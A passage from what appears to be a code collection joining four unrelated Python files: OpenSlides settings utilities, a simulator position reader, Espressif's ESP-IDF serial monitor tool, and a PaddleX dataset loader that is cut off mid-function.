openslides.utils.main.
"""
if openslides_type is None:
openslides_type = detect_openslides_type()
if openslides_type == UNIX_VERSION:
parent_directory = os.environ.get(
"XDG_CONFIG_HOME", os.path.expanduser("~/.config")
)
elif openslides_type == WINDOWS_VERSION:
parent_directory = get_win32_app_data_dir()
elif openslides_type == WINDOWS_PORTABLE_VERSION:
parent_directory = get_win32_portable_dir()
else:
raise TypeError(f"{openslides_type} is not a valid OpenSlides type.")
return os.path.join(parent_directory, "openslides")
def get_local_settings_dir() -> str:
"""
Returns the path to a local settings.
On Unix systems: 'personal_data/var/'
"""
return os.path.join("personal_data", "var")
def setup_django_settings_module(
settings_path: str = None, local_installation: bool = False
) -> None:
"""
Sets the environment variable ENVIRONMENT_VARIABLE, that means
'DJANGO_SETTINGS_MODULE', to the given settings.
If no settings_path is given and the environment variable is already set,
then this function does nothing.
If the argument settings_path is set, then the environment variable is
always overwritten.
"""
if settings_path is None and os.environ.get(ENVIRONMENT_VARIABLE, ""):
return
if settings_path is None:
if local_installation:
settings_dir = get_local_settings_dir()
else:
settings_dir = get_default_settings_dir()
settings_path = os.path.join(settings_dir, "settings.py")
settings_file = os.path.basename(settings_path)
settings_module_name = ".".join(settings_file.split(".")[:-1])
if "." in settings_module_name:
raise ImproperlyConfigured(
"'.' is not an allowed character in the settings-file"
)
# Change the python path. Also set the environment variable python path, so
# change of the python path also works after a reload
settings_module_dir = os.path.abspath(os.path.dirname(settings_path))
sys.path.insert(0, settings_module_dir)
try:
os.environ["PYTHONPATH"] = os.pathsep.join(
(settings_module_dir, os.environ["PYTHONPATH"])
)
except KeyError:
# The environment variable is empty
os.environ["PYTHONPATH"] = settings_module_dir
# Set the environment variable to the settings module
os.environ[ENVIRONMENT_VARIABLE] = settings_module_name
def get_default_settings_context(user_data_dir: str = None) -> Dict[str, str]:
"""
Returns the default context values for the settings template:
'openslides_user_data_path', 'import_function' and 'debug'.
The argument 'user_data_path' is a given path for user specific data or None.
"""
# Setup path for user specific data (SQLite3 database, media, ...):
# Take it either from command line or get default path
default_context = {}
if user_data_dir:
default_context["openslides_user_data_dir"] = repr(user_data_dir)
default_context["import_function"] = ""
else:
openslides_type = detect_openslides_type()
if openslides_type == WINDOWS_PORTABLE_VERSION:
default_context[
"openslides_user_data_dir"
] = "get_win32_portable_user_data_dir()"
default_context[
"import_function"
] = "from openslides.utils.main import get_win32_portable_user_data_dir"
else:
data_dir = get_default_user_data_dir(openslides_type)
default_context["openslides_user_data_dir"] = repr(
os.path.join(data_dir, "openslides")
)
default_context["import_function"] = ""
default_context["debug"] = "False"
return default_context
def get_default_user_data_dir(openslides_type: str) -> str:
"""
Returns the default directory for user specific data according to the OpenSlides
type.
The argument 'openslides_type' has to be one of the three types mentioned
in openslides.utils.main.
"""
if openslides_type == UNIX_VERSION:
default_user_data_dir = os.environ.get(
"XDG_DATA_HOME", os.path.expanduser("~/.local/share")
)
elif openslides_type == WINDOWS_VERSION:
default_user_data_dir = get_win32_app_data_dir()
elif openslides_type == WINDOWS_PORTABLE_VERSION:
default_user_data_dir = get_win32_portable_dir()
else:
raise TypeError(f"{openslides_type} is not a valid OpenSlides type.")
return default_user_data_dir
def get_win32_app_data_dir() -> str:
"""
Returns the directory of Windows' AppData directory.
"""
shell32 = ctypes.WinDLL("shell32.dll") # type: ignore
SHGetFolderPath = shell32.SHGetFolderPathW
SHGetFolderPath.argtypes = (
ctypes.c_void_p,
ctypes.c_int,
ctypes.c_void_p,
ctypes.c_uint32,
ctypes.c_wchar_p,
)
SHGetFolderPath.restype = ctypes.c_uint32
CSIDL_LOCAL_APPDATA = 0x001C
MAX_PATH = 260
buf = ctypes.create_unicode_buffer(MAX_PATH)
res = SHGetFolderPath(0, CSIDL_LOCAL_APPDATA, 0, 0, buf)
if res != 0:
# TODO: Write other exception
raise Exception("Could not determine Windows' APPDATA path")
return buf.value # type: ignore
def get_win32_portable_dir() -> str:
"""
Returns the directory of the Windows portable version.
"""
# NOTE: sys.executable will be the path to openslides.exe
# since it is essentially a small wrapper that embeds the
# python interpreter
portable_dir = os.path.dirname(os.path.abspath(sys.executable))
try:
fd, test_file = tempfile.mkstemp(dir=portable_dir)
except OSError:
raise PortableDirNotWritable(
"Portable directory is not writeable. "
"Please choose another directory for settings and data files."
)
else:
os.close(fd)
os.unlink(test_file)
return portable_dir
def get_win32_portable_user_data_dir() -> str:
"""
Returns the user data directory to the Windows portable version.
"""
return os.path.join(get_win32_portable_dir(), "openslides")
def write_settings(
settings_dir: str = None,
settings_filename: str = "settings.py",
template: str = None,
**context: str,
) -> str:
"""
Creates the settings file at the given dir using the given values for the
file template.
Retuns the path to the created settings.
"""
if settings_dir is None:
settings_dir = get_default_settings_dir()
settings_path = os.path.join(settings_dir, settings_filename)
if template is None:
with open(
os.path.join(os.path.dirname(__file__), "settings.py.tpl")
) as template_file:
template = template_file.read()
# Create a random SECRET_KEY to put it in the settings.
# from django.core.management.commands.startproject
chars = "abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*(-_=+)"
context.setdefault("secret_key", get_random_string(50, chars))
for key, value in get_default_settings_context().items():
context.setdefault(key, value)
content = template % context
settings_module = os.path.realpath(settings_dir)
if not os.path.exists(settings_module):
os.makedirs(settings_module)
with open(settings_path, "w") as settings_file:
settings_file.write(content)
if context["openslides_user_data_dir"] == "get_win32_portable_user_data_dir()":
openslides_user_data_dir = get_win32_portable_user_data_dir()
else:
openslides_user_data_dir = context["openslides_user_data_dir"].strip("'")
os.makedirs(os.path.join(openslides_user_data_dir, "static"), exist_ok=True)
return os.path.realpath(settings_path)
def open_browser(host: str, port: int) -> None:
"""
Launches the default web browser at the given host and port and opens
the webinterface. Uses start_browser internally.
"""
if host == "0.0.0.0":
# Windows does not support 0.0.0.0, so use 'localhost' instead
start_browser(f"http://localhost:{port}")
else:
start_browser(f"http://{host}:{port}")
def start_browser(browser_url: str) -> None:
"""
Launches the default web browser at the given url and opens the
webinterface.
"""
try:
browser = webbrowser.get()
except webbrowser.Error:
print("Could not locate runnable browser: Skipping start")
else:
def function() -> None:
# TODO: Use a nonblocking sleep event here.
time.sleep(1)
browser.open(browser_url)
thread = threading.Thread(target=function)
thread.start()
def get_database_path_from_settings() -> Optional[str]:
"""
Retrieves the database path out of the settings file. Returns None,
if it is not a SQLite3 database.
Needed for the backupdb command.
"""
from django.conf import settings as django_settings
from django.db import DEFAULT_DB_ALIAS
db_settings = django_settings.DATABASES
default = db_settings.get(DEFAULT_DB_ALIAS)
if not default:
raise DatabaseInSettingsError("Default databases is not configured")
database_path = default.get("NAME")
if not database_path:
raise DatabaseInSettingsError("No path or name specified for default database.")
if default.get("ENGINE") != "django.db.backends.sqlite3":
database_path = None
return database_path
def is_local_installation() -> bool:
"""
Returns True if the command is called for a local installation
This is the case if manage.py is used, or when the --local-installation flag is set.
"""
return (
True
if "--local-installation" in sys.argv or "manage.py" in sys.argv[0]
else False
)
def is_windows() -> bool:
"""
Returns True if the current system is Windows. Returns False otherwise.
"""
return sys.platform == "win32"
|
Input.py
|
import datetime
import math
import subprocess
import sys
import threading
import Config
import Event
started = False
position = None
rotation = None
speed = None
rotation_speed = None
lock = threading.Lock()
def init():
args = [sys.argv[1]]
if 'map' in Config.config:
args.append('-map')
args.append(Config.config['map'])
if 'position' in Config.config:
args.append('-pos')
args.append(Config.config['position'])
if 'rotation' in Config.config:
args.append('-rot')
args.append(Config.config['rotation'])
if 'truck' in Config.config:
args.append('-truck')
args.append(Config.config['truck'])
if 'enter' in Config.config:
args.append('-enter')
cmd = subprocess.Popen(args, stdout=subprocess.PIPE)
thread = threading.Thread(target=read_stdin, args=(cmd.stdout,))
thread.start()
def read_stdin(ror_input):
previous_position = [0.0, 0.0, 0.0]
previous_rotation = [0.0, 0.0, 0.0]
previous_timestamp = datetime.datetime.now()
while True:
try:
for byte_array_line in ror_input:
line = byte_array_line.decode('utf-8')
if line[0:9] == "Position:":
timestamp = datetime.datetime.now()
stripped = line.replace('\x1b[0m\n', '').replace(' ', '')
data = stripped.split(':')
numeric_value = data[1].split(',')
global position
global rotation
global speed
global rotation_speed
lock.acquire()
position = [float(numeric_value[0]), float(numeric_value[1]), float(numeric_value[2])]
rotation = [float(numeric_value[3]), float(numeric_value[4]), float(numeric_value[5])]
global started
if started is False:
previous_position = position
previous_rotation = rotation
speed = [0.0, 0.0, 0.0]
rotation_speed = [0.0, 0.0, 0.0]
started = True
else:
duration = timestamp - previous_timestamp
# print("duration", duration.total_seconds())
for i in range(3):
speed[i] = (position[i] - previous_position[i]) / duration.total_seconds()
rotation_speed[i] = (rotation[i] - previous_rotation[i]) / duration.total_seconds()
previous_timestamp = timestamp
previous_position = position
lock.release()
Event.set_event()
Event.clear_event()
# print("pos", position)
# print("rot", rotation)
# print("spd", speed)
else:
print(line)
# print(line, end='')
except UnicodeDecodeError:
print("UnicodeDecodeError exception")
def get_position():
global lock
global position
lock.acquire()
ret_position = position
lock.release()
return ret_position
def get_rotation():
global lock
global rotation
lock.acquire()
ret_rotation = rotation
lock.release()
return ret_rotation
def get_speed():
global lock
global speed
lock.acquire()
ret_speed = speed
lock.release()
return ret_speed
def get_speed_norm():
global speed
return math.sqrt(speed[0] * speed[0] + speed[1] * speed[1] + speed[2] * speed[2])
def get_rotation_speed():
global lock
global rotation_speed
lock.acquire()
ret_speed = rotation_speed
lock.release()
return ret_speed
def is_started():
global started
return started
|
idf_monitor.py
|
#!/usr/bin/env python
#
# esp-idf serial output monitor tool. Does some helpful things:
# - Looks up hex addresses in ELF file with addr2line
# - Reset ESP32 via serial RTS line (Ctrl-T Ctrl-R)
# - Run "make flash" (Ctrl-T Ctrl-F)
# - Run "make app-flash" (Ctrl-T Ctrl-A)
# - If gdbstub output is detected, gdb is automatically loaded
#
# Copyright 2015-2016 Espressif Systems (Shanghai) PTE LTD
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Contains elements taken from miniterm "Very simple serial terminal" which
# is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# Originally released under BSD-3-Clause license.
#
from __future__ import print_function, division
import subprocess
import argparse
import codecs
import re
import os
try:
import queue
except ImportError:
import Queue as queue
import time
import sys
import serial
import serial.tools.miniterm as miniterm
import threading
import ctypes
import types
from distutils.version import StrictVersion
key_description = miniterm.key_description
# Control-key characters
CTRL_A = '\x01'
CTRL_B = '\x02'
CTRL_F = '\x06'
CTRL_H = '\x08'
CTRL_R = '\x12'
CTRL_T = '\x14'
CTRL_RBRACKET = '\x1d' # Ctrl+]
# ANSI terminal codes
ANSI_RED = '\033[1;31m'
ANSI_YELLOW = '\033[0;33m'
ANSI_NORMAL = '\033[0m'
def color_print(message, color):
""" Print a message to stderr with colored highlighting """
sys.stderr.write("%s%s%s\n" % (color, message, ANSI_NORMAL))
def yellow_print(message):
color_print(message, ANSI_YELLOW)
def red_print(message):
color_print(message, ANSI_RED)
__version__ = "1.0"
# Tags for tuples in queues
TAG_KEY = 0
TAG_SERIAL = 1
# regex matches an potential PC value (0x4xxxxxxx)
MATCH_PCADDR = re.compile(r'0x4[0-9a-f]{7}', re.IGNORECASE)
DEFAULT_TOOLCHAIN_PREFIX = "xtensa-esp32-elf-"
class StoppableThread(object):
"""
Provide a Thread-like class which can be 'cancelled' via a subclass-provided
cancellation method.
Can be started and stopped multiple times.
Isn't an instance of type Thread because Python Thread objects can only be run once
"""
def __init__(self):
self._thread = None
@property
def alive(self):
"""
Is 'alive' whenever the internal thread object exists
"""
return self._thread is not None
def start(self):
if self._thread is None:
self._thread = threading.Thread(target=self._run_outer)
self._thread.start()
def _cancel(self):
pass # override to provide cancellation functionality
def run(self):
pass # override for the main thread behaviour
def _run_outer(self):
try:
self.run()
finally:
self._thread = None
def stop(self):
if self._thread is not None:
old_thread = self._thread
self._thread = None
self._cancel()
old_thread.join()
class ConsoleReader(StoppableThread):
""" Read input keys from the console and push them to the queue,
until stopped.
"""
def __init__(self, console, event_queue):
super(ConsoleReader, self).__init__()
self.console = console
self.event_queue = event_queue
def run(self):
self.console.setup()
try:
while self.alive:
try:
if os.name == 'nt':
# Windows kludge: because the console.cancel() method doesn't
# seem to work to unblock getkey() on the Windows implementation.
#
# So we only call getkey() if we know there's a key waiting for us.
import msvcrt
while not msvcrt.kbhit() and self.alive:
time.sleep(0.1)
if not self.alive:
break
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if c is not None:
self.event_queue.put((TAG_KEY, c), False)
finally:
self.console.cleanup()
def _cancel(self):
if os.name == 'posix':
# this is the way cancel() is implemented in pyserial 3.3 or newer,
# older pyserial (3.1+) has cancellation implemented via 'select',
# which does not work when console sends an escape sequence response
#
# even older pyserial (<3.1) does not have this method
#
# on Windows there is a different (also hacky) fix, applied above.
#
# note that TIOCSTI is not implemented in WSL / bash-on-Windows.
# TODO: introduce some workaround to make it work there.
import fcntl, termios
fcntl.ioctl(self.console.fd, termios.TIOCSTI, b'\0')
class SerialReader(StoppableThread):
""" Read serial data from the serial port and push to the
event queue, until stopped.
"""
def __init__(self, serial, event_queue):
super(SerialReader, self).__init__()
self.baud = serial.baudrate
self.serial = serial
self.event_queue = event_queue
if not hasattr(self.serial, 'cancel_read'):
# enable timeout for checking alive flag,
# if cancel_read not available
self.serial.timeout = 0.25
def run(self):
if not self.serial.is_open:
self.serial.baudrate = self.baud
self.serial.rts = True # Force an RTS reset on open
self.serial.open()
self.serial.rts = False
try:
while self.alive:
data = self.serial.read(self.serial.in_waiting or 1)
if len(data):
self.event_queue.put((TAG_SERIAL, data), False)
finally:
self.serial.close()
def _cancel(self):
if hasattr(self.serial, 'cancel_read'):
try:
self.serial.cancel_read()
except:
pass
class Monitor(object):
"""
Monitor application main class.
This was originally derived from miniterm.Miniterm, but it turned out to be easier to write from scratch for this
purpose.
Main difference is that all event processing happens in the main thread, not the worker threads.
"""
def __init__(self, serial_instance, elf_file, make="make", toolchain_prefix=DEFAULT_TOOLCHAIN_PREFIX, eol="CRLF"):
super(Monitor, self).__init__()
self.event_queue = queue.Queue()
self.console = miniterm.Console()
if os.name == 'nt':
sys.stderr = ANSIColorConverter(sys.stderr)
self.console.output = ANSIColorConverter(self.console.output)
self.console.byte_output = ANSIColorConverter(self.console.byte_output)
if StrictVersion(serial.VERSION) < StrictVersion('3.3.0'):
# Use Console.getkey implementation from 3.3.0 (to be in sync with the ConsoleReader._cancel patch above)
def getkey_patched(self):
c = self.enc_stdin.read(1)
if c == unichr(0x7f):
c = unichr(8) # map the BS key (which yields DEL) to backspace
return c
self.console.getkey = types.MethodType(getkey_patched, self.console)
self.serial = serial_instance
self.console_reader = ConsoleReader(self.console, self.event_queue)
self.serial_reader = SerialReader(self.serial, self.event_queue)
self.elf_file = elf_file
self.make = make
self.toolchain_prefix = toolchain_prefix
self.menu_key = CTRL_T
self.exit_key = CTRL_RBRACKET
self.translate_eol = {
"CRLF": lambda c: c.replace(b"\n", b"\r\n"),
"CR": lambda c: c.replace(b"\n", b"\r"),
"LF": lambda c: c.replace(b"\r", b"\n"),
}[eol]
# internal state
self._pressed_menu_key = False
self._read_line = b""
self._gdb_buffer = b""
def main_loop(self):
self.console_reader.start()
self.serial_reader.start()
try:
while self.console_reader.alive and self.serial_reader.alive:
(event_tag, data) = self.event_queue.get()
if event_tag == TAG_KEY:
self.handle_key(data)
elif event_tag == TAG_SERIAL:
self.handle_serial_input(data)
else:
raise RuntimeError("Bad event data %r" % ((event_tag,data),))
finally:
try:
self.console_reader.stop()
self.serial_reader.stop()
except:
pass
sys.stderr.write(ANSI_NORMAL + "\n")
def handle_key(self, key):
if self._pressed_menu_key:
self.handle_menu_key(key)
self._pressed_menu_key = False
elif key == self.menu_key:
self._pressed_menu_key = True
elif key == self.exit_key:
self.console_reader.stop()
self.serial_reader.stop()
else:
try:
key = self.translate_eol(key)
self.serial.write(codecs.encode(key))
except serial.SerialException:
pass # this shouldn't happen, but sometimes port has closed in serial thread
except UnicodeEncodeError:
pass # this can happen if a non-ascii character was passed, ignoring
def handle_serial_input(self, data):
# this may need to be made more efficient, as it pushes out a byte
# at a time to the console
for b in data:
self.console.write_bytes(b)
if b == b'\n': # end of line
self.handle_serial_input_line(self._read_line.strip())
self._read_line = b""
else:
self._read_line += b
self.check_gdbstub_trigger(b)
def handle_serial_input_line(self, line):
for m in re.finditer(MATCH_PCADDR, line):
self.lookup_pc_address(m.group())
def handle_menu_key(self, c):
if c == self.exit_key or c == self.menu_key: # send verbatim
self.serial.write(codecs.encode(c))
elif c in [ CTRL_H, 'h', 'H', '?' ]:
red_print(self.get_help_text())
elif c == CTRL_R: # Reset device via RTS
self.serial.setRTS(True)
time.sleep(0.2)
self.serial.setRTS(False)
elif c == CTRL_F: # Recompile & upload
self.run_make("flash")
elif c == CTRL_A: # Recompile & upload app only
self.run_make("app-flash")
else:
red_print('--- unknown menu character {} --'.format(key_description(c)))
def get_help_text(self):
return """
--- idf_monitor ({version}) - ESP-IDF monitor tool
--- based on miniterm from pySerial
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {reset:7} Reset target board via RTS line
--- {make:7} Run 'make flash' to build & flash
--- {appmake:7} Run 'make app-flash to build & flash app
""".format(version=__version__,
exit=key_description(self.exit_key),
menu=key_description(self.menu_key),
reset=key_description(CTRL_R),
make=key_description(CTRL_F),
appmake=key_description(CTRL_A),
)
def __enter__(self):
""" Use 'with self' to temporarily disable monitoring behaviour """
self.serial_reader.stop()
self.console_reader.stop()
def __exit__(self, *args, **kwargs):
""" Use 'with self' to temporarily disable monitoring behaviour """
self.console_reader.start()
self.serial_reader.start()
def prompt_next_action(self, reason):
self.console.setup() # set up console to trap input characters
try:
red_print("""
--- {}
--- Press {} to exit monitor.
--- Press {} to run 'make flash'.
--- Press {} to run 'make app-flash'.
--- Press any other key to resume monitor (resets target).""".format(reason,
key_description(self.exit_key),
key_description(CTRL_F),
key_description(CTRL_A)))
k = CTRL_T # ignore CTRL-T here, so people can muscle-memory Ctrl-T Ctrl-F, etc.
while k == CTRL_T:
k = self.console.getkey()
finally:
self.console.cleanup()
if k == self.exit_key:
self.event_queue.put((TAG_KEY, k))
elif k in [ CTRL_F, CTRL_A ]:
self.event_queue.put((TAG_KEY, self.menu_key))
self.event_queue.put((TAG_KEY, k))
def run_make(self, target):
with self:
yellow_print("Running make %s..." % target)
p = subprocess.Popen([self.make,
target ])
try:
p.wait()
except KeyboardInterrupt:
p.wait()
if p.returncode != 0:
self.prompt_next_action("Build failed")
def lookup_pc_address(self, pc_addr):
translation = subprocess.check_output(
["%saddr2line" % self.toolchain_prefix,
"-pfiaC", "-e", self.elf_file, pc_addr],
cwd=".")
if not "?? ??:0" in translation:
yellow_print(translation)
def check_gdbstub_trigger(self, c):
self._gdb_buffer = self._gdb_buffer[-6:] + c # keep the last 7 characters seen
m = re.match(b"\\$(T..)#(..)", self._gdb_buffer) # look for a gdb "reason" for a break
if m is not None:
try:
chsum = sum(ord(p) for p in m.group(1)) & 0xFF
calc_chsum = int(m.group(2), 16)
except ValueError:
return # payload wasn't valid hex digits
if chsum == calc_chsum:
self.run_gdb()
else:
red_print("Malformed gdb message... calculated checksum %02x received %02x" % (chsum, calc_chsum))
def run_gdb(self):
with self: # disable console control
sys.stderr.write(ANSI_NORMAL)
try:
subprocess.call(["%sgdb" % self.toolchain_prefix,
"-ex", "set serial baud %d" % self.serial.baudrate,
"-ex", "target remote %s" % self.serial.port,
"-ex", "interrupt", # monitor has already parsed the first 'reason' command, need a second
self.elf_file], cwd=".")
except KeyboardInterrupt:
pass # happens on Windows, maybe other OSes
self.prompt_next_action("gdb exited")
def main():
parser = argparse.ArgumentParser("idf_monitor - a serial output monitor for esp-idf")
parser.add_argument(
'--port', '-p',
help='Serial port device',
default=os.environ.get('ESPTOOL_PORT', '/dev/ttyUSB0')
)
parser.add_argument(
'--baud', '-b',
help='Serial port baud rate',
type=int,
default=os.environ.get('MONITOR_BAUD', 115200))
parser.add_argument(
'--make', '-m',
help='Command to run make',
type=str, default='make')
parser.add_argument(
'--toolchain-prefix',
help="Triplet prefix to add before cross-toolchain names",
default=DEFAULT_TOOLCHAIN_PREFIX)
parser.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="End of line to use when sending to the serial port",
default='CR')
parser.add_argument(
'elf_file', help='ELF file of application',
type=argparse.FileType('rb'))
args = parser.parse_args()
if args.port.startswith("/dev/tty."):
args.port = args.port.replace("/dev/tty.", "/dev/cu.")
yellow_print("--- WARNING: Serial ports accessed as /dev/tty.* will hang gdb if launched.")
yellow_print("--- Using %s instead..." % args.port)
serial_instance = serial.serial_for_url(args.port, args.baud,
do_not_open=True)
serial_instance.dtr = False
serial_instance.rts = False
args.elf_file.close() # don't need this as a file
# remove the parallel jobserver arguments from MAKEFLAGS, as any
# parent make is only running 1 job (monitor), so we can re-spawn
# all of the child makes we need (the -j argument remains part of
# MAKEFLAGS)
try:
makeflags = os.environ["MAKEFLAGS"]
makeflags = re.sub(r"--jobserver[^ =]*=[0-9,]+ ?", "", makeflags)
os.environ["MAKEFLAGS"] = makeflags
except KeyError:
pass # not running a make jobserver
monitor = Monitor(serial_instance, args.elf_file.name, args.make, args.toolchain_prefix, args.eol)
yellow_print('--- idf_monitor on {p.name} {p.baudrate} ---'.format(
p=serial_instance))
yellow_print('--- Quit: {} | Menu: {} | Help: {} followed by {} ---'.format(
key_description(monitor.exit_key),
key_description(monitor.menu_key),
key_description(monitor.menu_key),
key_description(CTRL_H)))
monitor.main_loop()
if os.name == 'nt':
# Windows console stuff
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
# wincon.h values
FOREGROUND_INTENSITY = 8
FOREGROUND_GREY = 7
# matches the ANSI color change sequences that IDF sends
RE_ANSI_COLOR = re.compile(b'\033\\[([01]);3([0-7])m')
# list mapping the 8 ANSI colors (the indexes) to Windows Console colors
ANSI_TO_WINDOWS_COLOR = [ 0, 4, 2, 6, 1, 5, 3, 7 ]
GetStdHandle = ctypes.windll.kernel32.GetStdHandle
SetConsoleTextAttribute = ctypes.windll.kernel32.SetConsoleTextAttribute
class ANSIColorConverter(object):
"""Class to wrap a file-like output stream, intercept ANSI color codes,
and convert them into calls to Windows SetConsoleTextAttribute.
Doesn't support all ANSI terminal code escape sequences, only the sequences IDF uses.
Ironically, in Windows this console output is normally wrapped by winpty which will then detect the console text
color changes and convert these back to ANSI color codes for MSYS' terminal to display. However this is the
least-bad working solution, as winpty doesn't support any "passthrough" mode for raw output.
"""
def __init__(self, output):
self.output = output
self.handle = GetStdHandle(STD_ERROR_HANDLE if self.output == sys.stderr else STD_OUTPUT_HANDLE)
self.matched = b''
def write(self, data):
for b in data:
l = len(self.matched)
if b == '\033': # ESC
self.matched = b
elif (l == 1 and b == '[') or (1 < l < 7):
self.matched += b
if self.matched == ANSI_NORMAL: # reset console
SetConsoleTextAttribute(self.handle, FOREGROUND_GREY)
self.matched = b''
elif len(self.matched) == 7: # could be an ANSI sequence
m = re.match(RE_ANSI_COLOR, self.matched)
if m is not None:
color = ANSI_TO_WINDOWS_COLOR[int(m.group(2))]
if m.group(1) == b'1':
color |= FOREGROUND_INTENSITY
SetConsoleTextAttribute(self.handle, color)
else:
self.output.write(self.matched) # not an ANSI color code, display verbatim
self.matched = b''
else:
try:
self.output.write(b)
except IOError:
# Windows 10 bug since the Fall Creators Update, sometimes writing to console randomly fails
# (but always succeeds the second time, it seems.) Ref https://github.com/espressif/esp-idf/issues/1136
self.output.write(b)
self.matched = b''
def flush(self):
self.output.flush()
if __name__ == "__main__":
main()
|
dataset.py
|
# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from threading import Thread
import multiprocessing
import collections
import numpy as np
import six
import sys
import copy
import random
import platform
import chardet
import paddlex.utils.logging as logging
class EndSignal():
pass
def is_pic(img_name):
valid_suffix = ['JPEG', 'jpeg', 'JPG', 'jpg', 'BMP', 'bmp', 'PNG', 'png']
suffix = img_name.split('.')[-1]
if suffix not in valid_suffix:
return False
return True
def is_valid(sample):
if sample is None:
return False
if isinstance(sample, tuple):
for s in sample:
if s is None:
return False
elif isinstance(s, np.ndarray) and s.size == 0:
return False
elif isinstance(s, collections.Sequence) and len(s) == 0:
return False
return True
def get_encoding(path):
f = open(path, 'rb')
data = f.read()
file_encoding = chardet.detect(data).get('encoding')
return file_encoding
def multithread_reader(mapper,
reader,
num_workers=4,
buffer_size=1024,
batch_size=8,
drop_last=True):
from queue import Queue
end = EndSignal()
# define a worker to read samples from reader to in_queue
def read_worker(reader, in_queue):
for i in reader():
in_queue.put(i)
in_queue.put(end)
# define a worker to handle samples from in_queue by mapper
# and put mapped samples into out_queue
def handle_worker(in_queue, out_queue, mapper):
sample = in_queue.get()
while not isinstance(sample, EndSignal):
if len(sample) == 2:
r = mapper(sample[0], sample[1])
elif len(sample) == 3:
r = mapper(sample[0], sample[1], sample[2])
else:
raise Exception('The sample\'s length must be 2 or 3.')
if is_valid(r):
out_queue.put(r)
sample = in_queue.get()
in_queue.put(end)
out_queue.put(end)
def xreader():
in_queue = Queue(buffer_size)
out_queue = Queue(buffer_size)
# start a read worker in a thread
target = read_worker
t = Thread(target=target, args=(reader, in_queue))
t.daemon = True
t.start()
# start several handle_workers
target = handle_worker
args = (in_queue, out_queue, mapper)
workers = []
for i in range(num_workers):
worker = Thread(target=target, args=args)
worker.daemon = True
workers.append(worker)
for w in workers:
w.start()
batch_data = []
sample = out_queue.get()
while not isinstance(sample, EndSignal):
batch_data.append(sample)
if len(batch_data) == batch_size:
batch_data = GenerateMiniBatch(batch_data)
yield batch_data
batch_data = []
sample = out_queue.get()
finish = 1
while finish < num_workers:
sample = out_queue.get()
if isinstance(sample, EndSignal):
finish += 1
else:
batch_data.append(sample)
if len(batch_data) == batch_size:
batch_data = GenerateMiniBatch(batch_data)
yield batch_data
batch_data = []
if not drop_last and len(batch_data) != 0:
batch_data = GenerateMiniBatch(batch_data)
yield batch_data
batch_data = []
return xreader
def multiprocess_reader(mapper,
reader,
num_workers=4,
buffer_size=1024,
batch_size=8,
drop_last=True):
from .shared_queue import SharedQueue as Queue
def _read_into_queue(samples, mapper, queue):
end = EndSignal()
try:
for sample in samples:
if sample is None:
raise ValueError("sample has None")
if len(sample) == 2:
result = mapper(sample[0], sample[1])
elif len(sample) == 3:
result = mapper(sample[0], sample[1], sample[2])
else:
raise Exception('The sample\'s length must be 2 or 3.')
if is_valid(result):
queue.put(result)
queue.put(end)
except:
queue.put("")
six.reraise(*sys.exc_info())
def queue_reader():
queue = Queue(buffer_size, memsize=3 * 1024**3)
total_samples = [[] for i in range(num_workers)]
for i, sample in enumerate(reader()):
index = i % num_workers
total_samples[index].append(sample)
for i in range(num_workers):
p = multiprocessing.Process(
target=_read_into_queue,
args=(total_samples[i], mapper, queue))
p.start()
finish_num = 0
batch_data = list()
while finish_num < num_workers:
sample = queue.get()
if isinstance(sample, EndSignal):
finish_num += 1
elif sample == "":
raise ValueError("multiprocess reader raises an exception")
else:
batch_data.append(sample)
if len(batch_data) == batch_size:
batch_data = GenerateMiniBatch(batch_data)
yield batch_data
batch_data = []
if len(batch_data) != 0 and not drop_last:
batch_data = GenerateMiniBatch(batch_data)
yield batch_data
batch_data = []
return queue_reader
def GenerateMiniBatch(batch_data):
if len(batch_data) == 1:
return batch_data
width = [data[0].shape[2] for data in batch_data]
height = [data[0].shape[1] for data in batch_data]
if len(set(width)) == 1 and len(set(height)) == 1:
return batch_data
max_shape = np.array([data[0].shape for data in batch_data]).max(axis=0)
padding_batch = []
for data in batch_data:
im_c, im_h, im_w = data[0].shape[:]
padding_im = np.zeros(
(im_c, max_shape[1], max_shape[2]), dtype=np.float32)
padding_im[:, :im_h, :im_w] = data[0]
padding_batch.append((padding_im, ) + data[1:])
return padding_batch
class Dataset:
def __init__(self,
transforms=None,
num_workers='auto',
buffer_size=100,
parallel_method='process',
shuffle=False):
if num_workers == 'auto':
import multiprocessing as mp
num_workers = mp.cpu_count() // 2 if mp.cpu_count() // 2 < 8 else 8
if platform.platform().startswith("Darwin") or platform.platform(
).startswith("Windows"):
parallel_method = 'thread'
if transforms is None:
raise Exception("transform should be defined.")
self.transforms = transforms
self.num_workers = num_workers
self.buffer_size = buffer_size
self.parallel_method = parallel_method
self.shuffle = shuffle
def generator(self, batch_size=1, drop_last=True):
self.batch_size = batch_size
parallel_reader = multithread_reader
if self.parallel_method == "process":
if platform.platform().startswith("Windows"):
logging.debug(
"multiprocess_reader is not supported in Windows platform, force to use multithread_reader."
)
else:
parallel_reader = multiprocess_reader
return parallel_reader(
self.transforms,
self.iterator,
num_workers=self.num_workers,
buffer_size=self.buffer_size,
batch_size=batch_size,
drop_last=drop_last)
def set_num_samples(self, num_samples):
if num_samples > len(self.file_list):
logging.warning(
